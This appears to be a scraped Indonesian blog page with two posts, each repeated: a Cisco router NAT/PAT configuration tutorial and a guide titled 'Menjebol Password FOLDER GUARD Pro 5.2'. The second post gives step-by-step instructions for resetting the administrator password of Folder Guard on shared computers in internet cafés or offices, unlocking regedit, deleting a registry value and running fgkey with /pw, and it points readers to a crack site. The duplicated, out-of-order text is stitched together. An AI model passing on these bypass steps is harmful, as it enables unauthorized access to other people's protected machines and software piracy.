Berdasarkan mapping tadi, NAT device atau router yg melakukan map bisa mengetahui bahwa packet reply dari 22.22.22.22 harus dikirimkan ke host 192.168.1.2 dan paket reply dari 33.33.33.33 harus dikirimkan ke host 192.168.1.3
Dari ke-2 contoh di atas kelihatan bahwa untuk normal NAT atau one-to-one NAT, setiap private IP akan memiliki public IP sendiri sehingga setiap host di jaringan kita masih bisa di hubungi dari luar. Host dari Internet masih bisa utk menghubungi tiap host kita karena
mereka memiliki public IP yg berbeda-beda.
Namun untuk kasus many-to-one NAT atau PAT, host dari Internet tidak dapat menghubungi setiap host karena semua host memiliki 1 public IP yg sama. Host dari internet hanya bisa me-reply koneksi dari host kita berdasarkan source port yg berbeda-beda.
Ok, langsung masuk contoh konfigurasi biar makin jelas. Contoh dilakukan dgn menggunakan Cisco router dgn 1 ethernet interface konek ke internal network dan 1 serial interface konek ke Internet. Kalo udah ngerti konsepnya bisa pake NAT device apa aja, gue sendiri buat memproteksi home lab gue pake OpenBSD PF.
Topologi:
Internal network – (eth0) router (s0/0) – internet
Internal network kita menggunakan private IP 192.168.1.0/24. IP address eth0 router kita 192.168.1.1 yg merupakan default gateway dari semua host di internal network.
1. Many-to-one PAT, semua private IP ke 1 public IP address
Kita cuma dapet 1 IP address dari ISP 195.1.134.2/30 yg juga merupakan IP address serial 0/0, router ISP kita menggunakan IP 195.1.134.1 yg juga merupakan default route router kita.
Maka konfigurasi PAT sbg berikut:
- Buat ACL yg mem-permit semua network 192.168.1.0/24
Router(config)#ip access-list standard internal_network
Router(config-std-nacl)#permit 192.168.1.0 0.0.0.255
- Bikin NAT rule untuk mentranslate net 192.168.1.0/24 ke 195.1.134.2 yg merupakan IP address s0/0
Router(config)#ip nat inside source list internal_network interface s0/0 overload
- enable NAT di interface e0/0 dan s0/0
Router(config)#int e0/0
Router(config-if)#ip nat inside
Router(config)#int s0/0
Router(config-if)#ip nat outside
2. ISP kita ternyata memberikan kita public IP 195.1.134.0/24, yg berarti range public IP yg bisa kita gunakan adalah 195.1.134.1 – 195.1.134.254. Ini berarti kita bisa melakukan one-to-one NAT, contoh:
192.168.1.1 ke 195.1.134.1
192.168.1.2 ke 195.1.134.2, dst.
Maka konfigurasi yg perlu dilakukan hanya:
Router(config)#ip nat inside source static network 192.168.1.0 195.1.134.0 /24
Tentunya enable NAT di e0/0 dan s0/0 spt contoh no.1
3. Kalo gak dapet persis 254 public IP gimana? Misal dapetnya 195.1.134.0/29, yg berarti range public IP yg bisa digunakan adalah 195.1.134.1-195.1.134.6 (ingat dgn /29 ada total 8 IP dari 0 sampai 7, tapi 0 adalah network address dan 7 sebagai IP terakhir merupakan
broadcast address).
Jika kita mau mentranslate net 192.168.1.0/24 ke range IP 195.1.134.1-195.1.134.6
- bikin NAT pool
Router(config)#ip nat pool public_IP 195.1.134.1 195.1.134.6 netmask 255.255.255.248
- bikin NAT rule, pake ACL internal_network spt contoh no.1 buat permit semua internal net 192.168.1.0/24
Router(config)#ip nat inside source list intenal_network pool public_IP
Jgn lupa enable NAT di e0/0 dan s0/0 spt contoh no.1
4. Ada masalah dgn contoh no.3? Ada.
Dalam 1 waktu, hanya ada 6 internal private IP yg bisa di translate ke 6 public IP. Jadi koneksi dari internal host ke 7 akan gagal dan harus menunggu sampai translation mapping timeout dan di clear, sehingga public ip kembali tersedia.
Cara mengatasinya, kita bisa bikin pool dgn 5 public IP address, dan 1 IP terakhir buat PAT. IP terakhir, 195.1.134.6 digunakan sbg IP address utk interface s0/0
Router(config)#ip nat pool public_IP 195.1.134.1 195.1.134.5 netmask 255.255.255.248
Router(config)#ip nat inside source list internal_network pool public_IP
Router(config)#ip nat inside source list internal_network interface s0/0 overload
Dgn begini, 5 private IP yg pertama akan di translate ke 5 public IP di pool, sedangkan private IP yg lain akan di translate ke ip ke-6, yg merupakan ip address dari interface s0/0.
5. Ok, ayo masuk ke contoh yg lebih advance:
Kita punya 6 public IP dari range 195.1.134.1.- 195.1.134.6
IP address 195.1.134.4 kita gunakan sbg ip address interface s0/0 router kita
IP address 195.1.134.1 digunakan oleh router ISP interface s0/0, yg merupakan default gateway router kita
IP address 195.1.134.2 mau kita gunakan sbg ip address web server kita, dgn real IP 192.168.1.2
Dan IP addres 195.1.134.3 mau kita gunakan sbg ip address mail server kita, dgn real IP 192.168.1.3
Sisanya, 195.1.134.5 dan 6, akan kita pergunakan nanti jika kita punya server2 baru
- Bikin ACL buat semua network, access-list internal_network permit 192.168.1.0 0.0.0.255
- Konfigure PAT buat semua internal network ke interface s0/0
Router(config)#ip nat inside source list internal_network interface s0/0 overload
- Bikin one-to-one NAT buat web dan mail server
Router(config)#ip nat inside source static 192.168.1.2 195.1.134.2
Router(config)#ip nat inside source static 192.168.1.3 195.1.134.3
Jgn kuatir jika terjadi overlap antara static NAT diatas dgn PAT di konfigurasi sebelumnya. Static NAT akan meng-overide rule utk 192.168.1.2 dan 192.168.1.3, sehingga ke-2 IP tsb tidak akan di PAT meskipun termasuk dlm ACL internal_network.
Jgn lupa enable NAT di interface s0/0 dan e0/0 spt contoh no.1
Dan kalo kita punya IOS Firewall dan ACL ingress in interface s0/0, maka kita harus permit koneksi dari internet ke public IP web dan mail server kita, dgn port yg terkait spt tcp 80 dan 25. Jadi di ACL ingress s0/0 jgn gunakan real IP address.
6. Kita terkoneksi dgn ISP, router kita cuman dapet 1 public IP address buat interface s0/0 tapi punya web server dan mail server? Jgn kuatir, ini bisa dilakukan dgn teknik port redirection.
Jadi, bikin dulu PAT biar internal network kita bisa konek ke Internet
Router(config)#ip nat inside source list internal_network interface s0/0 overload
Trus bikin port redirection buat traffic ke port 80 dan 25, di contoh ini private IP web server kita tetap 192.168.1.2 dan mail server 192.168.1.3
Router(config)#ip nat inside source static tcp 192.168.1.2 80 interface s0/0 80
Router(config)#ip nat inside source static tcp 192.168.1.3 25 interface s0/0 25
Dgn cara begini, traffic yg datang ke public IP interface serial port 80 akan di redirect ke real IP web server 192.168.1.2, dan traffic yg datang ke serial port 25 akan di redirect ke real IP mail server 192.168.1.3
Tinggal daftar di public DNS server untuk web dan MX record mail server kita, untuk me-resolve ke public IP router interface s0/0. Keuntungan lain dgn cara PAT ke interface adalah kita bisa saja mendapatkan IP address yg berbeda-beda (dynamic IP) setiap kali konek ke ISP.
Dgn setingan di atas, kita tidak perlu kuatir IP kita akan berubah.
Hanya mungkin public IP yg kita daftarkan untuk web dan mail server di public DNS server harus selalu di-update sesuai dgn IP address yg sedang kita dapatkan.
Mulai kerasakan The Power of NAT?
Read More..
10.0.0.0 - 10.255.255.255 (10/8 prefix)
172.16.0.0 - 172.31.255.255 (172.16/12 prefix)
192.168.0.0 - 192.168.255.255 (192.168/16 prefix)
Dan karena ini adalah private address, jaringan kita tentunya tidak dapat berkomunikasi dgn jaringan lain di Internet, karena semua host yg ingin terkoneksi di Internet harus menggunakan global atau public IP address. Untuk ini kita perlu men-translate IP address kita yg private menjadi public IP address.
Alasan lain untuk menggunakan NAT adalah security. Kita bisa men-translate seluruh jaringan kita (missal 254 PC) menjadi 1 public IP. Teknik ini disebut many-to-one NAT atau biasa disebut Port Address Translation (PAT). Teknik ini sangat bermanfaat jika kita menginginkan user di jaringan kita untuk meng-inisiasi koneksi ke Internet (browsing internet atau mengirim email misalnya), tapi kita tidak menginginkan host dari Internet untk meng-inisiasi koneksi ke PC user kita.
Host dari Internet tidak bisa meng-inisiasi koneksi ke internal host kita karena hanya ada 1 public IP address yg terlihat di jaringan kita, sedangkan jumlah PC yg sebenarnya ada lebih dari 1. Tentunya jika PC kita yg meng-inisiasi, maka reply atau return packet akan bisa
kembali karena device yg kita gunakan untuk melakukan NAT, akan memiliki mapping table dari NAT yg terjadi di jaringan.
Untuk kasus one-to-one NAT, dimana 1 private IP akan di-translate menjadi 1 global IP, maka mapping nya akan spt berikut:
Router#sh ip nat tra
Pro Inside global Inside local Outside local Outside global
— 195.1.134.1 192.168.1.1 — —
— 195.1.134.2 192.168.1.2 — —
Dalam contoh ini, IP private 192.168.1.1 di-translate ke public IP 195.1.134.1, IP private 192.168.1.2 di-translate ke public IP 195.1.134.2 dst.
Inside local adalah terminologi utk real IP address PC di jaringan kita, sedangkan Inside Global adalah public IP address yg kita gunakan untuk men-translasi real IP address tsb.
Outside local adalah local IP address dari tujuan kita sebagaimana kita melihatnya dari jaringan kita. Sedangkan Outside global adalah global IP address dari tujuan kita yg terlihat di Internet.
Ini bermanfaat utk destination based NAT, sbg contoh sbg berikut:
Ada server di Internet dgn global IP address 11.11.11.11, tapi kita ingin semua users di jaringan kita utk melihat server tsb sbg 192.168.1.11
Maka kita bisa melakukan destination based NAT, dgn outside local adalah 192.168.1.11 dan outside global, IP address tujuan yg sebenernya, adalah 11.11.11.11.
Jika kita tidak melakukan destination based NAT, maka outside local dan outside global dari tujuan kita akan sama, yaitu public IP tujuan yg sebenernya, dan ini bisa dilihat di contoh mapping PAT.
Untuk contoh many-to-one NAT atau PAT, dimana banyak real IP dari PC kita di-translate menjadi 1 public IP, maka contoh mapping nya sbg berikut:
Router#sh ip nat tra
Pro Inside global Inside local Outside local Outside global
tcp 195.1.134.4:12338 192.168.1.3:12338 33.33.33.33:23 33.33.33.33:23
tcp 195.1.134.4:12337 192.168.1.2:12337 22.22.22.22:23 22.22.22.22:23
Dalam contoh ini, kita melakukan telnet (destination tcp port 23) ke remote host 22.22.22.22
dari private IP 192.168.1.2, dan telnet ke remote host 33.33.33.33 dari private IP 192.168.1.3.
Kita bisa lihat bahwa ke-2 private IP kita di-translate ke public IP yg sama, yaitu 195.1.134.4. Yg membedakan adalah source port yg digunakan di public IP.
Jadi di mapping ini terlihat bahwa koneksi dari 192.168.1.2 di map ke 195.1.134.4 port 12337, sedangkan koneksi dari 192.168.1.3 di map ke 195.1.134.4 port 12338.
Dgn adanya mapping ini, remote host 22.22.22.22 ketika mengirimkan paket reply (ingat di TCP/IP reply dari remote host destination portnya ditujukan ke source port dari host kita), akan mengirimkan paket ke 195.1.134.4 port 12337. Sedangkan reply packet dari 33.33.33.33 kan ke 195.1.134.4 port 12338.
Berdasarkan mapping tadi, NAT device atau router yg melakukan map bisa mengetahui bahwa packet reply dari 22.22.22.22 harus dikirimkan ke host 192.168.1.2 dan paket reply dari 33.33.33.33 harus dikirimkan ke host 192.168.1.3
Dari ke-2 contoh di atas kelihatan bahwa untuk normal NAT atau one-to-one NAT, setiap private IP akan memiliki public IP sendiri sehingga setiap host di jaringan kita masih bisa di hubungi dari luar. Host dari Internet masih bisa utk menghubungi tiap host kita karena
mereka memiliki public IP yg berbeda-beda.
Namun untuk kasus many-to-one NAT atau PAT, host dari Internet tidak dapat menghubungi setiap host karena semua host memiliki 1 public IP yg sama. Host dari internet hanya bisa me-reply koneksi dari host kita berdasarkan source port yg berbeda-beda.
Ok, langsung masuk contoh konfigurasi biar makin jelas. Contoh dilakukan dgn menggunakan Cisco router dgn 1 ethernet interface konek ke internal network dan 1 serial interface konek ke Internet. Kalo udah ngerti konsepnya bisa pake NAT device apa aja, gue sendiri buat memproteksi home lab gue pake OpenBSD PF.
Topologi:
Internal network – (eth0) router (s0/0) – internet
Internal network kita menggunakan private IP 192.168.1.0/24. IP address eth0 router kita 192.168.1.1 yg merupakan default gateway dari semua host di internal network.
1. Many-to-one PAT, semua private IP ke 1 public IP address
Kita cuma dapet 1 IP address dari ISP 195.1.134.2/30 yg juga merupakan IP address serial 0/0, router ISP kita menggunakan IP 195.1.134.1 yg juga merupakan default route router kita.
Maka konfigurasi PAT sbg berikut:
- Buat ACL yg mem-permit semua network 192.168.1.0/24
Router(config)#ip access-list standard internal_network
Router(config-std-nacl)#permit 192.168.1.0 0.0.0.255
- Bikin NAT rule untuk mentranslate net 192.168.1.0/24 ke 195.1.134.2 yg merupakan IP address s0/0
Router(config)#ip nat inside source list internal_network interface s0/0 overload
- enable NAT di interface e0/0 dan s0/0
Router(config)#int e0/0
Router(config-if)#ip nat inside
Router(config)#int s0/0
Router(config-if)#ip nat outside
2. ISP kita ternyata memberikan kita public IP 195.1.134.0/24, yg berarti range public IP yg bisa kita gunakan adalah 195.1.134.1 – 195.1.134.254. Ini berarti kita bisa melakukan one-to-one NAT, contoh:
192.168.1.1 ke 195.1.134.1
192.168.1.2 ke 195.1.134.2, dst.
Maka konfigurasi yg perlu dilakukan hanya:
Router(config)#ip nat inside source static network 192.168.1.0 195.1.134.0 /24
Tentunya enable NAT di e0/0 dan s0/0 spt contoh no.1
3. Kalo gak dapet persis 254 public IP gimana? Misal dapetnya 195.1.134.0/29, yg berarti range public IP yg bisa digunakan adalah 195.1.134.1-195.1.134.6 (ingat dgn /29 ada total 8 IP dari 0 sampai 7, tapi 0 adalah network address dan 7 sebagai IP terakhir merupakan
broadcast address).
Jika kita mau mentranslate net 192.168.1.0/24 ke range IP 195.1.134.1-195.1.134.6
- bikin NAT pool
Router(config)#ip nat pool public_IP 195.1.134.1 195.1.134.6 netmask 255.255.255.248
- bikin NAT rule, pake ACL internal_network spt contoh no.1 buat permit semua internal net 192.168.1.0/24
Router(config)#ip nat inside source list intenal_network pool public_IP
Jgn lupa enable NAT di e0/0 dan s0/0 spt contoh no.1
4. Ada masalah dgn contoh no.3? Ada.
Dalam 1 waktu, hanya ada 6 internal private IP yg bisa di translate ke 6 public IP. Jadi koneksi dari internal host ke 7 akan gagal dan harus menunggu sampai translation mapping timeout dan di clear, sehingga public ip kembali tersedia.
Cara mengatasinya, kita bisa bikin pool dgn 5 public IP address, dan 1 IP terakhir buat PAT. IP terakhir, 195.1.134.6 digunakan sbg IP address utk interface s0/0
Router(config)#ip nat pool public_IP 195.1.134.1 195.1.134.5 netmask 255.255.255.248
Router(config)#ip nat inside source list internal_network pool public_IP
Router(config)#ip nat inside source list internal_network interface s0/0 overload
Dgn begini, 5 private IP yg pertama akan di translate ke 5 public IP di pool, sedangkan private IP yg lain akan di translate ke ip ke-6, yg merupakan ip address dari interface s0/0.
5. Ok, ayo masuk ke contoh yg lebih advance:
Kita punya 6 public IP dari range 195.1.134.1.- 195.1.134.6
IP address 195.1.134.4 kita gunakan sbg ip address interface s0/0 router kita
IP address 195.1.134.1 digunakan oleh router ISP interface s0/0, yg merupakan default gateway router kita
IP address 195.1.134.2 mau kita gunakan sbg ip address web server kita, dgn real IP 192.168.1.2
Dan IP addres 195.1.134.3 mau kita gunakan sbg ip address mail server kita, dgn real IP 192.168.1.3
Sisanya, 195.1.134.5 dan 6, akan kita pergunakan nanti jika kita punya server2 baru
- Bikin ACL buat semua network, access-list internal_network permit 192.168.1.0 0.0.0.255
- Konfigure PAT buat semua internal network ke interface s0/0
Router(config)#ip nat inside source list internal_network interface s0/0 overload
- Bikin one-to-one NAT buat web dan mail server
Router(config)#ip nat inside source static 192.168.1.2 195.1.134.2
Router(config)#ip nat inside source static 192.168.1.3 195.1.134.3
Jgn kuatir jika terjadi overlap antara static NAT diatas dgn PAT di konfigurasi sebelumnya. Static NAT akan meng-overide rule utk 192.168.1.2 dan 192.168.1.3, sehingga ke-2 IP tsb tidak akan di PAT meskipun termasuk dlm ACL internal_network.
Jgn lupa enable NAT di interface s0/0 dan e0/0 spt contoh no.1
Dan kalo kita punya IOS Firewall dan ACL ingress in interface s0/0, maka kita harus permit koneksi dari internet ke public IP web dan mail server kita, dgn port yg terkait spt tcp 80 dan 25. Jadi di ACL ingress s0/0 jgn gunakan real IP address.
6. Kita terkoneksi dgn ISP, router kita cuman dapet 1 public IP address buat interface s0/0 tapi punya web server dan mail server? Jgn kuatir, ini bisa dilakukan dgn teknik port redirection.
Jadi, bikin dulu PAT biar internal network kita bisa konek ke Internet
Router(config)#ip nat inside source list internal_network interface s0/0 overload
Trus bikin port redirection buat traffic ke port 80 dan 25, di contoh ini private IP web server kita tetap 192.168.1.2 dan mail server 192.168.1.3
Router(config)#ip nat inside source static tcp 192.168.1.2 80 interface s0/0 80
Router(config)#ip nat inside source static tcp 192.168.1.3 25 interface s0/0 25
Dgn cara begini, traffic yg datang ke public IP interface serial port 80 akan di redirect ke real IP web server 192.168.1.2, dan traffic yg datang ke serial port 25 akan di redirect ke real IP mail server 192.168.1.3
Tinggal daftar di public DNS server untuk web dan MX record mail server kita, untuk me-resolve ke public IP router interface s0/0. Keuntungan lain dgn cara PAT ke interface adalah kita bisa saja mendapatkan IP address yg berbeda-beda (dynamic IP) setiap kali konek ke ISP.
Dgn setingan di atas, kita tidak perlu kuatir IP kita akan berubah.
Hanya mungkin public IP yg kita daftarkan untuk web dan mail server di public DNS server harus selalu di-update sesuai dgn IP address yg sedang kita dapatkan.
Mulai kerasakan The Power of NAT?
Read More..
Menjebol Password FOLDER GUARD Pro 5.2
Keamanan memang sangat penting melihat perkembangan teknologi informasi yang demikian pesat sekarang ini, namun teknologi kejahatan saat ini masih lebih unggul satu tingkat dibanding dengan pencegahannya. Tapi itu tidak menjadi landasan untuk kita bisa terus mengikuti perkembangan Teknologi security yang mungkin akan lebih maju.
Mungkin Anda pernah mendengar salah satu tools proteksi berbasis windows yang sangat terkenal yaitu FOLDER GUARD, versi terbarunya FOLDER GUARD PRO 5.3, untuk FOLDER GUARD PRO 5.2 bisa Anda cari di www.google.com, & dan cracknya di http://paulyoung.yeah.net.
Software ini memang dibilang sangat handal dibanding dengan software proteksi lainya , karena bisa menghiddenkan subkey yang berhubungan dengan system folder guard tersebut, sehingga akan membuat kita kesulitan untuk melihat sejauh mana sistem tersebut. Tapi perlu diketahui banyak software proteksi yang memberikan fitur-fitur praktis, sehingga akan memudahkan penggunanya dan akan mengundang adanya hole pada software itu sendiri, Contohnya FOLDER GUARD PRO 5.2.
Sewaktu kita instalasi software ini, kita akan diminta untuk mengeset apa yang perlu diproteksi, apakah folder atau sistem, baru kita akan diminta untuk memasukan password Administrator dan Master dan setelah itu di save.
Password Administrator berfungsi untuk kita menjalankan folder Guard, sedangkan password Master berfungsi untuk menjalankan Toggle protection sehingga proteksi proteksi folder guard bisa dibikin enabled atau disabled secara cepat tanpa perlu konfigurasi.
Nah biasanya setelah kita instalasi folder guard dia akan membuat folder di directory windows\desktop\Folder Guard. Mungkin Anda sudah nggak sabar denger ocehan saya. Sekarang coba anda klik file Reset password yang ada di \windows\desktop\Folder Guard. Setelah itu Anda akan diminta Mengisi form registrasi pertama kalian, sebelumnya saya ingatkan anda diminta mencari dulu crack buat folder guard pro 5.2 setelah itu isi form registrasi harus sama dengan yang anda isi sewaktu instalasi pertama. Nah dengan cara tersebut diatas kita akan masuk ke folder guard tanpa password.
Â
Â
Tapi yang menjadi masalah jika posisi kita diwarnet atau di kantor yang menggunakan software folder guard , tentunya kita masukin username serta registrasi code kita dg menggunakan software Cracking folder guard pro 5.2, hal itu tidak akan berhasil Karena dia akan meminta user name registrasi serta codenya sewaktu install pertama bukan registrasi code yang baru.
Sekarang bagaimana kalau di warnet atau kantor mudah saja, coba Anda copykan file Fgkey.exe, Fguard32.dll, Fguard.vxd dari komputer Anda yang ada didirektory \Program Files\WinAbility\Folder Guard\ kedalam disket, kalau sudah klik tombol start trus run, ketik regedit kalau regedit dikunci Anda import aja file .reg yang berisikan disabled registry tools dari disket Anda lalu klik kanan, kalau sudah masuk ke subkey \HKEY_LOCAL_MACHINE\Software\Winability\Folder Guard\Setup\1, setelah itu delete key yang name valuenya info.
Sekarang buat shortcut untuk file fgkey.exe yang ada di drive A, trus tambahkan options / pw,pada command line “A:\fgkey†/pw , isi nama shortcutnya dengan reset.
Â
lalu kalian klik shortcut reset tersebut kemudian klik continue pada form registrasi, jika keluar message “The Administrator's Password For Folder Guard has been reset†berarti Selamat anda telah berhasil menembus password administrator folder guard pro 5.2. Perlu diketahui cara ini juga sudah saya coba pada Folder Guard pro 5.3 yang terbaru dan berhasil, sekarang coba jalankan program folder guardnya, kalian masuk tanpa password setelah itu kalian bisa rubah setting proteksinya sekaligus mengganti passwordnya eh nggak boleh jahat. Artikel ini saya buat untuk tujuan security, sehingga para pemilik warnet bisa lebih hati-hati & waspada dalam hal proteksi sistem.
Read More..
Mungkin Anda pernah mendengar salah satu tools proteksi berbasis windows yang sangat terkenal yaitu FOLDER GUARD, versi terbarunya FOLDER GUARD PRO 5.3, untuk FOLDER GUARD PRO 5.2 bisa Anda cari di www.google.com, & dan cracknya di http://paulyoung.yeah.net.
Software ini memang dibilang sangat handal dibanding dengan software proteksi lainya , karena bisa menghiddenkan subkey yang berhubungan dengan system folder guard tersebut, sehingga akan membuat kita kesulitan untuk melihat sejauh mana sistem tersebut. Tapi perlu diketahui banyak software proteksi yang memberikan fitur-fitur praktis, sehingga akan memudahkan penggunanya dan akan mengundang adanya hole pada software itu sendiri, Contohnya FOLDER GUARD PRO 5.2.
Sewaktu kita instalasi software ini, kita akan diminta untuk mengeset apa yang perlu diproteksi, apakah folder atau sistem, baru kita akan diminta untuk memasukan password Administrator dan Master dan setelah itu di save.
Password Administrator berfungsi untuk kita menjalankan folder Guard, sedangkan password Master berfungsi untuk menjalankan Toggle protection sehingga proteksi proteksi folder guard bisa dibikin enabled atau disabled secara cepat tanpa perlu konfigurasi.
Nah biasanya setelah kita instalasi folder guard dia akan membuat folder di directory windows\desktop\Folder Guard. Mungkin Anda sudah nggak sabar denger ocehan saya. Sekarang coba anda klik file Reset password yang ada di \windows\desktop\Folder Guard. Setelah itu Anda akan diminta Mengisi form registrasi pertama kalian, sebelumnya saya ingatkan anda diminta mencari dulu crack buat folder guard pro 5.2 setelah itu isi form registrasi harus sama dengan yang anda isi sewaktu instalasi pertama. Nah dengan cara tersebut diatas kita akan masuk ke folder guard tanpa password.
Â
Â
Tapi yang menjadi masalah jika posisi kita diwarnet atau di kantor yang menggunakan software folder guard , tentunya kita masukin username serta registrasi code kita dg menggunakan software Cracking folder guard pro 5.2, hal itu tidak akan berhasil Karena dia akan meminta user name registrasi serta codenya sewaktu install pertama bukan registrasi code yang baru.
Sekarang bagaimana kalau di warnet atau kantor mudah saja, coba Anda copykan file Fgkey.exe, Fguard32.dll, Fguard.vxd dari komputer Anda yang ada didirektory \Program Files\WinAbility\Folder Guard\ kedalam disket, kalau sudah klik tombol start trus run, ketik regedit kalau regedit dikunci Anda import aja file .reg yang berisikan disabled registry tools dari disket Anda lalu klik kanan, kalau sudah masuk ke subkey \HKEY_LOCAL_MACHINE\Software\Winability\Folder Guard\Setup\1, setelah itu delete key yang name valuenya info.
Sekarang buat shortcut untuk file fgkey.exe yang ada di drive A, trus tambahkan options / pw,pada command line “A:\fgkey†/pw , isi nama shortcutnya dengan reset.
Â
lalu kalian klik shortcut reset tersebut kemudian klik continue pada form registrasi, jika keluar message “The Administrator's Password For Folder Guard has been reset†berarti Selamat anda telah berhasil menembus password administrator folder guard pro 5.2. Perlu diketahui cara ini juga sudah saya coba pada Folder Guard pro 5.3 yang terbaru dan berhasil, sekarang coba jalankan program folder guardnya, kalian masuk tanpa password setelah itu kalian bisa rubah setting proteksinya sekaligus mengganti passwordnya eh nggak boleh jahat. Artikel ini saya buat untuk tujuan security, sehingga para pemilik warnet bisa lebih hati-hati & waspada dalam hal proteksi sistem.
Read More..